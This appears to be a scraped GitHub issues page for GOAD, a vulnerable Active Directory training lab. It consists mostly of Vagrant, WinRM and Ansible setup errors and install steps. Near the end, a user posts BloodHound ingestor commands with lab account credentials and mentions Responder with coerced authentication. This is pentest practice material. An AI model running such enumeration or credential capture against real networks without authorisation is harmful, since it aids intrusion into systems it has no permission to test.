orange-cyberdefense / goad Goto Github PK
View Code? Open in Web Editor NEWgame of active directory
License: GNU General Public License v3.0
game of active directory
License: GNU General Public License v3.0
Description: Ubuntu 22.04 LTS
Release: 22.04
Codename: jammy
Vagrant: 2.2.19
Ansible: Core 2.12.6
Running Vagrant Up results in WinrRM Error:
Edited: Included additional output
(.venv) test@AD-Lab:~/Desktop/GOAD$ vagrant up --provision
Bringing machine 'DC01' up with 'virtualbox' provider...
==> DC01: Importing base box 'StefanScherer/windows_2019'...
==> DC01: Matching MAC address for NAT networking...
==> DC01: Checking if box 'StefanScherer/windows_2019' version '2021.05.15' is up to date...
==> DC01: Setting the name of the VM: GOAD_DC01_1657733508313_12037
==> DC01: Clearing any previously set network interfaces...
==> DC01: Preparing network interfaces based on configuration...
DC01: Adapter 1: nat
DC01: Adapter 2: hostonly
==> DC01: Forwarding ports...
DC01: 3389 (guest) => 3389 (host) (adapter 1)
DC01: 5985 (guest) => 55985 (host) (adapter 1)
DC01: 5986 (guest) => 55986 (host) (adapter 1)
DC01: 22 (guest) => 2222 (host) (adapter 1)
==> DC01: Running 'pre-boot' VM customizations...
==> DC01: Booting VM...
==> DC01: Waiting for machine to boot. This may take a few minutes...
DC01: WinRM address: 127.0.0.1:55985
DC01: WinRM username: vagrant
DC01: WinRM execution_time_limit: PT2H
DC01: WinRM transport: plaintext
An error occurred executing a remote WinRM command.
Shell: Cmd
Command: hostname
Message: Digest initialization failed: initialization error
in the README.md
it says:
the lab take environ 60Go (but you have to get the space for the vms vagrant images windows server 2016 (6.15Go) / windows server 2019 (6.52) / ubuntu 18.04 (502M))
the total space needed for the lab is ~80-100 Go (and more if you take snapshots)
Could you explain what 60Go and ~80-100 Go are? What does Go mean? Do you mean GB as in gigabytes?
Edit: I see the language of the author is french as by the following sentence later in the README.md exchange sur kingslanding ou une autre machine ?
and the french translation of Gigabyte is GigaOctet (GO).
Perhaps you could update the README.md to be translated correctly? Otherwise I will look forward to deploy and play this game soon.
Windows 10 OS running Virtualbox 6.1
Running Vagrant up all appears to function as expected.
When we reach the part for the remote winrm section, it appears to timeout due to DC01 not booting fully.
It's difficult to demo of course over screen shot, but essentially the white spinning circle runs for a few revolutions then locks up.
I've attempted to boot this VM manually, with out any network adapter, or with the internal adapter attached only but no avail.
Default windows firewall is enabled on the Win 10 device.
Hi guys, i'm having some issue with ad-relations.yml
Previously, i had some error with MSSQL installation, but was able to troubleshoot it. But now i'm facing a new issue while installing ad-relations.yml. Here's the following errors. i cant add
I don't understand, the servers are up and running but it seems i can add other users, even if i'm doing it manually with users and computers tools. i took some snapshot, i tried to launch the playbook countless times, but error still persist
Here's the following error:
win_reboot: attempting post-reboot test command
EXEC (via pipeline wrapper)
win_reboot: attempting post-reboot test command
EXEC (via pipeline wrapper)
win_reboot: system successfully rebooted
changed: [192.168.56.11] => {
"changed": true,
"elapsed": 181,
"rebooted": true,
"unreachable": false
}
TASK [groups_domains : Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}}] *******************************************************************************
task path: /home/sparda/Documents/GIT/GOAD/ansible/roles/groups_domains/tasks/main.yml:5
Using module file /home/sparda/.ansible/collections/ansible_collections/community/windows/plugins/modules/win_domain_group_membership.ps1
Pipelining is enabled.
<192.168.56.11> ESTABLISH WINRM CONNECTION FOR USER: vagrant on PORT 5986 TO 192.168.56.11
Using module file /home/sparda/.ansible/collections/ansible_collections/community/windows/plugins/modules/win_domain_group_membership.ps1
Pipelining is enabled.
<192.168.56.12> ESTABLISH WINRM CONNECTION FOR USER: vagrant on PORT 5986 TO 192.168.56.12
EXEC (via pipeline wrapper)
EXEC (via pipeline wrapper)
FAILED - RETRYING: [192.168.56.12]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (3 retries left).Result was: {
"attempts": 1,
"changed": false,
"msg": "Unhandled exception while executing module: Unable to contact the server. This may be because this server does not exist, it is currently down, or it does not have the Active Directory Web Services running.",
"retries": 4
}
FAILED - RETRYING: [192.168.56.11]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (3 retries left).Result was: {
"attempts": 1,
"changed": false,
"msg": "Unhandled exception while executing module: Unable to contact the server. This may be because this server does not exist, it is currently down, or it does not have the Active Directory Web Services running.",
"retries": 4
}
Using module file /home/sparda/.ansible/collections/ansible_collections/community/windows/plugins/modules/win_domain_group_membership.ps1
Pipelining is enabled.
EXEC (via pipeline wrapper)
FAILED - RETRYING: [192.168.56.12]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (2 retries left).Result was: {
"attempts": 2,
"changed": false,
"msg": "Unhandled exception while executing module: Unable to contact the server. This may be because this server does not exist, it is currently down, or it does not have the Active Directory Web Services running.",
"retries": 4
}
Using module file /home/sparda/.ansible/collections/ansible_collections/community/windows/plugins/modules/win_domain_group_membership.ps1
Pipelining is enabled.
EXEC (via pipeline wrapper)
FAILED - RETRYING: [192.168.56.11]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (2 retries left).Result was: {
"attempts": 2,
"changed": false,
"msg": "Unhandled exception while executing module: Unable to contact the server. This may be because this server does not exist, it is currently down, or it does not have the Active Directory Web Services running.",
"retries": 4
}
Using module file /home/sparda/.ansible/collections/ansible_collections/community/windows/plugins/modules/win_domain_group_membership.ps1
Pipelining is enabled.
EXEC (via pipeline wrapper)
FAILED - RETRYING: [192.168.56.12]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (1 retries left).Result was: {
"attempts": 3,
"changed": false,
"msg": "Unhandled exception while executing module: Unable to contact the server. This may be because this server does not exist, it is currently down, or it does not have the Active Directory Web Services running.",
"retries": 4
}
Using module file /home/sparda/.ansible/collections/ansible_collections/community/windows/plugins/modules/win_domain_group_membership.ps1
Pipelining is enabled.
EXEC (via pipeline wrapper)
Using module file /home/sparda/.ansible/collections/ansible_collections/community/windows/plugins/modules/win_domain_group_membership.ps1
Pipelining is enabled.
EXEC (via pipeline wrapper)
The full traceback is:
Unable to contact the server. This may be because this server does not exist, it is currently down, or it does not have the Active Directory Web Services running.
At line:64 char:21
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ScriptStackTrace:
at , : line 64
Microsoft.ActiveDirectory.Management.ADServerDownException: Unable to contact the server. This may be because this server does not exist, it is currently down, or it does not have the Active Directory Web Services running. ---> System.ServiceModel.EndpointNotFoundException: No DNS entries exist for host north.sevenkingdoms.local.
Server stack trace:
at System.ServiceModel.Channels.DnsCache.Resolve(Uri uri)
at System.ServiceModel.Channels.SocketConnectionInitiator.GetIPAddresses(Uri uri)
at System.ServiceModel.Channels.SocketConnectionInitiator.Connect(Uri uri, TimeSpan timeout)
at System.ServiceModel.Channels.BufferedConnectionInitiator.Connect(Uri uri, TimeSpan timeout)
at System.ServiceModel.Channels.ConnectionPoolHelper.EstablishConnection(TimeSpan timeout)
at System.ServiceModel.Channels.ClientFramingDuplexSessionChannel.OnOpen(TimeSpan timeout)
at System.ServiceModel.Channels.CommunicationObject.Open(TimeSpan timeout)
at System.ServiceModel.Channels.ServiceChannel.OnOpen(TimeSpan timeout)
at System.ServiceModel.Channels.CommunicationObject.Open(TimeSpan timeout)
at System.ServiceModel.Channels.ServiceChannel.CallOpenOnce.System.ServiceModel.Channels.ServiceChannel.ICallOnce.Call(ServiceChannel channel, TimeSpan timeout)
at System.ServiceModel.Channels.ServiceChannel.CallOnceManager.CallOnce(TimeSpan timeout, CallOnceManager cascade)
at System.ServiceModel.Channels.ServiceChannel.EnsureOpened(TimeSpan timeout)
at System.ServiceModel.Channels.ServiceChannel.Call(String action, Boolean oneway, ProxyOperationRuntime operation, Object[] ins, Object[] outs, TimeSpan timeout)
at System.ServiceModel.Channels.ServiceChannelProxy.InvokeService(IMethodCallMessage methodCall, ProxyOperationRuntime operation)
at System.ServiceModel.Channels.ServiceChannelProxy.Invoke(IMessage message)
Exception rethrown at [0]:
at System.Runtime.Remoting.Proxies.RealProxy.HandleReturnMessage(IMessage reqMsg, IMessage retMsg)
at System.Runtime.Remoting.Proxies.RealProxy.PrivateInvoke(MessageData& msgData, Int32 type)
at Microsoft.ActiveDirectory.WebServices.Proxy.Resource.Get(Message request)
at Microsoft.ActiveDirectory.Management.AdwsConnection.SearchAnObject(ADSearchRequest request)
--- End of inner exception stack trace ---
at Microsoft.ActiveDirectory.Management.AdwsConnection.InitializeForAutoReconnect[TChannel](Boolean& isAutoReconnecting, TChannel& channel, ChannelFactory1& chFactory, String endpointName, CommunicationException& commException) at Microsoft.ActiveDirectory.Management.AdwsConnection.SearchAnObject(ADSearchRequest request) at Microsoft.ActiveDirectory.Management.AdwsConnection.Search(ADSearchRequest request) at Microsoft.ActiveDirectory.Management.ADWebServiceStoreAccess.Microsoft.ActiveDirectory.Management.IADSyncOperations.Search(ADSessionHandle handle, ADSearchRequest request) at Microsoft.ActiveDirectory.Management.ADObjectSearcher.GetRootDSE() at Microsoft.ActiveDirectory.Management.Commands.ADCmdletBase
1.GetRootDSE()
at Microsoft.ActiveDirectory.Management.Commands.ADCmdletBase1.GetConnectedStore() at Microsoft.ActiveDirectory.Management.Commands.ADCmdletBase
1.GetCmdletSessionInfo()
at Microsoft.ActiveDirectory.Management.Commands.ADGetCmdletBase3.ADGetCmdletBaseBeginCSRoutine() at Microsoft.ActiveDirectory.Management.CmdletSubroutinePipeline.Invoke() at Microsoft.ActiveDirectory.Management.Commands.ADCmdletBase
1.BeginProcessing()
failed: [192.168.56.12] (item={'key': 'DragonsFriends', 'value': ['north.sevenkingdoms.local\jon.snow', 'sevenkingdoms.local\tyron.lannister', 'essos.local\daenerys.targaryen']}) => {
"ansible_loop_var": "item",
"attempts": 3,
"changed": false,
"item": {
"key": "DragonsFriends",
"value": [
"north.sevenkingdoms.local\jon.snow",
"sevenkingdoms.local\tyron.lannister",
"essos.local\daenerys.targaryen"
]
},
"msg": "Unhandled exception while executing module: Unable to contact the server. This may be because this server does not exist, it is currently down, or it does not have the Active Directory Web Services running."
}
Using module file /home/sparda/.ansible/collections/ansible_collections/community/windows/plugins/modules/win_domain_group_membership.ps1
Pipelining is enabled.
EXEC (via pipeline wrapper)
FAILED - RETRYING: [192.168.56.12]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (3 retries left).Result was: {
"attempts": 1,
"changed": false,
"msg": "Unhandled exception while executing module: Unable to contact the server. This may be because this server does not exist, it is currently down, or it does not have the Active Directory Web Services running.",
"retries": 4
I'm running Ubuntu 22.04 with vagrant 2.2.18 as a workaround to resolve the issue described here: #12
This is the setup process I followed. Taken from the official setup process with added dependencies required for Ubuntu 22.04:
sudo apt update && sudo apt install curl docker.io ansible git virtualbox python3-pip python3.10-venv -y
(python3.8-venv not available on Ubuntu 22.04)
wget -O- https://apt.releases.hashicorp.com/gpg | gpg --dearmor | sudo tee /usr/share/keyrings/hashicorp-archive-keyring.gpg
echo "deb [signed-by=/usr/share/keyrings/hashicorp-archive-keyring.gpg] https://apt.releases.hashicorp.com $(lsb_release -cs) main" | sudo tee /etc/apt/sources.list.d/hashicorp.list
sudo apt update && sudo apt install vagrant=2.2.18
git clone https://github.com/Orange-Cyberdefense/GOAD
cd GOAD/ansible
sudo pip3 install virtualenv
python3 -m pip install --upgrade pip
python3.10 -m virtualenv .venv
Start venv environment:
source .venv/bin/activate
python3 -m pip install --upgrade pip
python3 -m pip install ansible-core==2.12.6
python3 -m pip install pywinrm
ansible-galaxy install -r requirements.yml
In ~/GOAD folder path:
sudo docker build -t goadansible .
##GOAD_backup folder in GOAD_VM main folder is the VM snapshot setup to this point.##
vagrant up
cd ansible
ansible-playbook main.yml
I get the following errors when running ansible-playbook main.yml:
TASK [Gathering Facts] *************************************************************************************************************
fatal: [192.168.56.10]: UNREACHABLE! => {"changed": false, "msg": "ssl: HTTPSConnectionPool(host='192.168.56.10', port=5986): Max retries exceeded with url: /wsman (Caused by NewConnectionError('<urllib3.connection.HTTPSConnection object at 0x7f7994eb4880>: Failed to establish a new connection: [Errno 113] No route to host'))", "unreachable": true}
TASK [member_server : Add member server] *******************************************************************************************
changed: [192.168.56.23]
fatal: [192.168.56.22]: FAILED! => {"changed": true, "msg": "failed to join domain: Computer 'castelblack' failed to join domain 'north.sevenkingdoms.local' from its current workgroup 'WORKGROUP' with following error message: The specified domain either does not exist or could not be contacted.", "reboot_required": false}
TASK [trusts : Add trusts between domain] ******************************************************************************************
fatal: [192.168.56.12]: FAILED! => {"changed": true, "debug": [], "error": [{"category_info": {"activity": "", "category": "NotSpecified", "category_id": 0, "reason": "MethodInvocationException", "target_name": "", "target_type": ""}, "error_details": null, "exception": {"help_link": null, "hresult": -2146233087, "inner_exception": {"help_link": null, "hresult": -2146233088, "inner_exception": null, "message": "The specified forest does not exist or cannot be contacted.", "source": "System.DirectoryServices", "type": "System.DirectoryServices.ActiveDirectory.ActiveDirectoryObjectNotFoundException"}, "message": "Exception calling "GetForest" with "1" argument(s): "The specified forest does not exist or cannot be contacted."", "source": "System.Management.Automation", "type": "System.Management.Automation.MethodInvocationException"}, "fully_qualified_error_id": "ActiveDirectoryObjectNotFoundException", "output": "Exception calling "GetForest" with "1" argument(s): "The specified forest does not exist or cannot be contacted."\r\n + CategoryInfo : NotSpecified: (:) [], MethodInvocationException\r\n + FullyQualifiedErrorId : ActiveDirectoryObjectNotFoundException\r\n \r\n", "pipeline_iteration_info": [0, 1], "script_stack_trace": "at , : line 19", "target_object": null}], "host_err": "", "host_out": "", "information": [], "output": [], "result": {}, "verbose": [], "warning": []}
TASK [password_policy : set password policy] ***************************************************************************************
fatal: [192.168.56.11]: FAILED! => {"changed": true, "debug": [], "error": [{"category_info": {"activity": "Set-ADDefaultDomainPasswordPolicy", "category": "ResourceUnavailable", "category_id": 21, "reason": "ADServerDownException", "target_name": "WORKGROUP", "target_type": "ADDefaultDomainPasswordPolicy"}, "error_details": null, "exception": {"help_link": null, "hresult": -2146233088, "inner_exception": {"help_link": null, "hresult": -2146233088, "inner_exception": null, "message": "Unable to find a default server with flags: 'Writable | ADWS | ReturnDnsName'.", "source": null, "type": "Microsoft.ActiveDirectory.Management.ADException"}, "message": "Unable to find a default server with Active Directory Web Services running.", "source": "Microsoft.ActiveDirectory.Management", "type": "Microsoft.ActiveDirectory.Management.ADServerDownException"}, "fully_qualified_error_id": "ActiveDirectoryServer:1355,Microsoft.ActiveDirectory.Management.Commands.SetADDefaultDomainPasswordPolicy", "output": "Set-ADDefaultDomainPasswordPolicy : Unable to find a default server with Active Directory Web Services running.\r\nAt line:19 char:1\r\n+ Set-ADDefaultDomainPasswordPolicy -Identity $Domain -AuthType Negotia ...\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : ResoureUnavailable: (WORKGROUP:ADDefaultDomainPasswordPolicy) \r\n[Set-ADDefaultDomainPasswordPolicy], ADServerDownException\r\n + FullyQualifiedErrorId : \r\nActiveDirectoryServer:1355,Microsoft.ActiveDirectory.Management.Commands.SetADDefaultDomainPasswordPolicy\r\n \r\n", "pipeline_iteration_info": [0, 1], "script_stack_trace": "at , : line 19", "target_object": {"AddedProperties": {"Comparer": {}, "Count": 0, "IsReadOnly": false}, "ComplexityEnabled": null, "LockoutDuration": null, "LockoutObservationWindow": null, "LockoutThreshold": null, "MaxPasswordAge": null, "MinPasswordAge": null, "MinPasswordLength": null, "ModifiedProperties": {"Comparer": {}, "Count": 0, "IsReadOnly": false}, "PasswordHistoryCount": null, "PropertyCount": 0, "PropertyNames": {"Count": 0, "IsReadOnly": true, "IsSynchronized": false, "SyncRoot": {}}, "RemovedProperties": {"Comparer": {}, "Count": 0, "IsReadOnly": false}, "ReversibleEncryptionEnabled": null}}], "host_err": "", "host_out": "", "information": [], "output": [], "result": {}, "verbose": [], "warning": []}
192.168.56.10 : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0
192.168.56.11 : ok=29 changed=16 unreachable=0 failed=1 skipped=2 rescued=0 ignored=0
192.168.56.12 : ok=30 changed=19 unreachable=0 failed=1 skipped=3 rescued=0 ignored=0
192.168.56.22 : ok=17 changed=10 unreachable=0 failed=1 skipped=2 rescued=0 ignored=0
192.168.56.23 : ok=41 changed=21 unreachable=0 failed=1 skipped=3 rescued=0 ignored=0
I try to deploy the GOAD v2 on my labs to learn active directory.
I have followed religiously the step for getting requierements:
sudo apt install python3.8-venv
cd ansible
virtualenv .venv
source .venv/bin/activate
python3 -m pip install --upgrade pip
python3 -m pip install ansible-core==2.12.6
python3 -m pip install pywinrm
ansible-galaxy install -r requirements.yml
ansible-playbook main.yml
But here is my output :
PLAY [Read data files] ***********************************************************************************************************************************************************************************
TASK [Gathering Facts] ***********************************************************************************************************************************************************************************
ok: [192.168.56.12]
ok: [192.168.56.11]
ok: [192.168.56.10]
ok: [192.168.56.22]
TASK [save the Json data to a Variable as a Fact] ********************************************************************************************************************************************************
ok: [192.168.56.10]
ok: [192.168.56.11]
ok: [192.168.56.22]
ok: [192.168.56.12]
PLAY [Adjust rights configuration] ***********************************************************************************************************************************************************************
TASK [Gathering Facts] ***********************************************************************************************************************************************************************************
ok: [192.168.56.12]
ok: [192.168.56.22]
ok: [192.168.56.10]
ok: [192.168.56.11]
TASK [settings/adjust_rights : Add domain users to local groups] *****************************************************************************************************************************************
changed: [192.168.56.12] => (item={'key': 'Administrators', 'value': ['essos\\daenerys.targaryen']})
changed: [192.168.56.22] => (item={'key': 'Administrators', 'value': ['north\\jeor.mormont']})
changed: [192.168.56.10] => (item={'key': 'Administrators', 'value': ['sevenkingdoms\\robert.baratheon', 'sevenkingdoms\\cersei.lannister']})
changed: [192.168.56.11] => (item={'key': 'Administrators', 'value': ['north\\eddard.stark', 'north\\catelyn.stark', 'north\\robb.stark']})
changed: [192.168.56.12] => (item={'key': 'Remote Desktop Users', 'value': ['essos\\Targaryen']})
changed: [192.168.56.22] => (item={'key': 'Remote Desktop Users', 'value': ['north\\Night Watch', 'north\\Mormont', 'north\\Stark']})
changed: [192.168.56.10] => (item={'key': 'Remote Desktop Users', 'value': ['sevenkingdoms\\Small Council']})
changed: [192.168.56.11] => (item={'key': 'Remote Desktop Users', 'value': ['north\\Stark']})
PLAY [cross domain groups] *******************************************************************************************************************************************************************************
TASK [Gathering Facts] ***********************************************************************************************************************************************************************************
ok: [192.168.56.12]
ok: [192.168.56.10]
ok: [192.168.56.11]
TASK [groups_domains : Reboot and wait for the AD system to restart] *************************************************************************************************************************************
changed: [192.168.56.10]
changed: [192.168.56.12]
changed: [192.168.56.11]
TASK [groups_domains : Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}}] *********************************************************************
FAILED - RETRYING: [192.168.56.12]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (3 retries left).
FAILED - RETRYING: [192.168.56.11]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (3 retries left).
FAILED - RETRYING: [192.168.56.12]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (2 retries left).
FAILED - RETRYING: [192.168.56.11]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (2 retries left).
FAILED - RETRYING: [192.168.56.12]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (1 retries left).
FAILED - RETRYING: [192.168.56.11]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (1 retries left).
An exception occurred during task execution. To see the full traceback, use -vvv. The error was: at Microsoft.ActiveDirectory.Management.Commands.ADCmdletBase`1.BeginProcessing()
failed: [192.168.56.12] (item={'key': 'DragonsFriends', 'value': ['north.sevenkingdoms.local\\jon.snow', 'sevenkingdoms.local\\tyron.lannister', 'essos.local\\daenerys.targaryen']}) => {"ansible_loop_var": "item", "attempts": 3, "changed": false, "item": {"key": "DragonsFriends", "value": ["north.sevenkingdoms.local\\jon.snow", "sevenkingdoms.local\\tyron.lannister", "essos.local\\daenerys.targaryen"]}, "msg": "Unhandled exception while executing module: Either the target name is incorrect or the server has rejected the client credentials."}
FAILED - RETRYING: [192.168.56.12]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (3 retries left).
failed: [192.168.56.11] (item={'key': 'AcrossTheSea', 'value': ['essos.local\\daenerys.targaryen']}) => {"added": [], "ansible_loop_var": "item", "attempts": 3, "changed": false, "item": {"key": "AcrossTheSea", "value": ["essos.local\\daenerys.targaryen"]}, "msg": "Could not find domain user, group, service account or computer named daenerys.targaryen", "removed": []}
FAILED - RETRYING: [192.168.56.12]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (2 retries left).
FAILED - RETRYING: [192.168.56.12]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (1 retries left).
An exception occurred during task execution. To see the full traceback, use -vvv. The error was: at Microsoft.ActiveDirectory.Management.Commands.ADCmdletBase`1.BeginProcessing()
failed: [192.168.56.12] (item={'key': 'Spys', 'value': ['sevenkingdoms.local\\Small Council']}) => {"ansible_loop_var": "item", "attempts": 3, "changed": false, "item": {"key": "Spys", "value": ["sevenkingdoms.local\\Small Council"]}, "msg": "Unhandled exception while executing module: Authentication failed on the remote side (the stream might still be available for additional authentication attempts)."}
The problem was already discussed on the issue #19 but since no information about the fix was given and reinstalling my venv + ansible didn't fix anything. I reopen another issue here because it must be different problem.
I'm running Ubuntu 18.04 and the Vagrant part seem to be setup properly.
Tried to launch the playbook 6 or 7 times but no luck for me..
Tried both the playbook alone and the main.yml 6 or 7 times.
Any idea of whats wrong ?
I have found the following comment in the playbook where the error occur :
# doesen't work see : https://github.com/ansible-collections/community.windows/blob/main/plugins/modules/win_domain_group_membership.ps1
# ligne 62 : use the given credentials to distant domain -> wrong
What is the fix i should implement if any ?
Hi @Mayfly277 , thank you for making this lab, its awesome! so much ready options, vectors of attacks, and customization :)
For me as beginner pentester it would be really great to have ability to discuss some techniques applied specifically to this lab; and I think it may be beneficial for many guys here :) Any chance you will create Discord server/channel for this? I'm ready to do it as well, if that's okay
Bonjour,
Juste pour savoir si le projet était toujours actif et en dev pour une implémentation d'autres vulnérabilités? Il serait intéressant d'ajouter un serveur SQL+WEB et CIFS. En ajoutant les vulnérabilités sur la délégation avec le serveur Web et sql etc etc
Merci pour tout, votre blog ainsi que toutes vos ressources sont vraiment top!!
Provisioning the VMs with ansible fails immediately due to not being able to reach the network.Output below. Have tried to then statically set the IP addresses on the Windows VMs however this also does not resolve the issue.
ansible-playbook main.yml
[WARNING]: Could not match supplied host pattern, ignoring: srv01
PLAY [build all] ******************************************************************************************************************************************************************************************
TASK [Gathering Facts] ************************************************************************************************************************************************************************************
^C [ERROR]: User interrupted execution
^C
ansible-playbook build.yml
[WARNING]: Could not match supplied host pattern, ignoring: srv01
PLAY [build all] ******************************************************************************************************************************************************************************************
TASK [Gathering Facts] ************************************************************************************************************************************************************************************
fatal: [192.168.56.10]: UNREACHABLE! => {"changed": false, "msg": "ssl: HTTPSConnectionPool(host='192.168.56.10', port=5986): Max retries exceeded with url: /wsman (Caused by ConnectTimeoutError(<urllib3.connection.HTTPSConnection object at 0x7f90e419c490>, 'Connection to 192.168.56.10 timed out. (connect timeout=500)'))", "unreachable": true}
fatal: [192.168.56.22]: UNREACHABLE! => {"changed": false, "msg": "ssl: HTTPSConnectionPool(host='192.168.56.22', port=5986): Max retries exceeded with url: /wsman (Caused by ConnectTimeoutError(<urllib3.connection.HTTPSConnection object at 0x7f90e419c580>, 'Connection to 192.168.56.22 timed out. (connect timeout=500)'))", "unreachable": true}
fatal: [192.168.56.11]: UNREACHABLE! => {"changed": false, "msg": "ssl: HTTPSConnectionPool(host='192.168.56.11', port=5986): Max retries exceeded with url: /wsman (Caused by ConnectTimeoutError(<urllib3.connection.HTTPSConnection object at 0x7f90e419c580>, 'Connection to 192.168.56.11 timed out. (connect timeout=500)'))", "unreachable": true}
fatal: [192.168.56.12]: UNREACHABLE! => {"changed": false, "msg": "ssl: HTTPSConnectionPool(host='192.168.56.12', port=5986): Max retries exceeded with url: /wsman (Caused by ConnectTimeoutError(<urllib3.connection.HTTPSConnection object at 0x7f90e419c580>, 'Connection to 192.168.56.12 timed out. (connect timeout=500)'))", "unreachable": true}
fatal: [192.168.56.23]: UNREACHABLE! => {"changed": false, "msg": "ssl: HTTPSConnectionPool(host='192.168.56.23', port=5986): Max retries exceeded with url: /wsman (Caused by ConnectTimeoutError(<urllib3.connection.HTTPSConnection object at 0x7f90e419c580>, 'Connection to 192.168.56.23 timed out. (connect timeout=500)'))", "unreachable": true}
PLAY RECAP ************************************************************************************************************************************************************************************************
192.168.56.10 : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0
192.168.56.11 : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0
192.168.56.12 : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0
192.168.56.22 : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0
192.168.56.23 : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0
==> DC01: Clearing any previously set network interfaces...
==> DC01: Preparing network interfaces based on configuration...
DC01: Adapter 1: nat
DC01: Adapter 2: hostonly
==> DC01: Forwarding ports...
DC01: 3389 (guest) => 2204 (host) (adapter 1)
DC01: 5985 (guest) => 2205 (host) (adapter 1)
DC01: 5986 (guest) => 2206 (host) (adapter 1)
DC01: 22 (guest) => 2207 (host) (adapter 1)
==> DC01: Running 'pre-boot' VM customizations...
==> DC01: Booting VM...
==> DC01: Waiting for machine to boot. This may take a few minutes...
DC01: WinRM address: 127.0.0.1:2205
DC01: WinRM username: vagrant
DC01: WinRM execution_time_limit: PT2H
DC01: WinRM transport: negotiate
An error occurred executing a remote WinRM command.
Shell: Cmd
Command: hostname
Message: Digest initialization failed: initialization error
Hello !
I'm using my own host to launch the BloodHound ingestor on Linux (using Exegol as you do in your guide).
It works fine for the following command:
bloodhound.py --zip -c All -d north.sevenkingdoms.local -u brandon.stark -p iseedeadpeople -dc winterfell.north.sevenkingdoms.local
However, for the 2 next following commands I get a "Connection timed out", even though it finds the domain.
bloodhound.py --zip -c All -d sevenkingdoms.local -u [email protected] -p iseedeadpeople -dc kingslanding.sevenkingdoms.local
bloodhound.py --zip -c All -d essos.local -u [email protected] -p iseedeadpeople -dc meereen.essos.local
My guess is that LDAP connection fails for whatever reason. But why would it work for the first command?
Edit :
I've done a lot of troubleshooting and everything with Ldap3 works fine.
The Windows ingestor used (directly on the machines) works fine as well.
So my guess is the BloodHound linux ingestor (bloodhound.py) struggles with some things related to vagrant + virtualbox...
Still following your guide, I noticed that I didn't get any connection on Responder (even when I attempt coerced authentications).
Before the question comes, I put the right interface name and IP 👍
Is there any troubleshoot steps I should take to know what is the problem here?
Fix: I had a firewall activated that was blocking incoming connections for Responder. I'm still troubleshooting for BloodHound but with no success for now.
Thank you in advance!
It would probably be a good enhancement to add velociraptor on elk.yml as an enhancement
I'm working on getting GOAD to launch on the Windows host by using Vagrant within WSL. The process is working up to the winrm connection. Vagrant is trying to connect to 127.0.0.1 but I need to to use the Windows host address instead. Where do I change that? It's not jumping out at me in the Vagrantfile.
For one host I am getting unreachable,
<192.168.56.22> ESTABLISH WINRM CONNECTION FOR USER: vagrant on PORT 5986 TO 192.168.56.22
fatal: [192.168.56.22]: UNREACHABLE! => {
"changed": false,
"msg": "ssl: HTTPSConnectionPool(host='192.168.56.22', port=5986): Max retries exceeded with url: /wsman (Caused by ConnectTimeoutError(<urllib3.connection.HTTPSConnection object at 0x10bfd7820>, 'Connection to 192.168.56.22 timed out. (connect timeout=500)'))",
"unreachable": true
}
Are they any instructional videos on how to build this? I have a laptop with 1TB SSH and 32 GB mem. It is running Ubuntu Desktop 22.04. Do I install Vbox and then another Ubuntu VM and then follow the instructions? How much ram and storage do I give the VM? Can I run vbox on Windows with a Ubuntu VM?
Thanks
FIX For MAC users:
Run 'export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES' before 'ansible-playbook main.yml'
I am stuck at this,
fatal: [192.168.56.22]: FAILED! => {
"changed": true,
"msg": "failed to join domain: Computer 'castelblack' failed to join domain 'north.sevenkingdoms.local' from its current workgroup 'WORKGROUP' with following error message: The specified network name is no longer available.",
"reboot_required": false
}
Did anyone saw this before?
Setup : Windows 10 machine - host , with virtualbox installed
- VirtualBox with Ubuntu 22 guest trying to clone and setup project
- error after running "vagrant up"
After a lot of troubleshooting : i disabled the hyperv in my windows host and enabled nested virtualization on virtualbox.
I also have vmware and i read somewere it might not play nice with the resources with virtualbox.
Any ideas?
TASK [password_policy : set password policy] *****************************************************************************
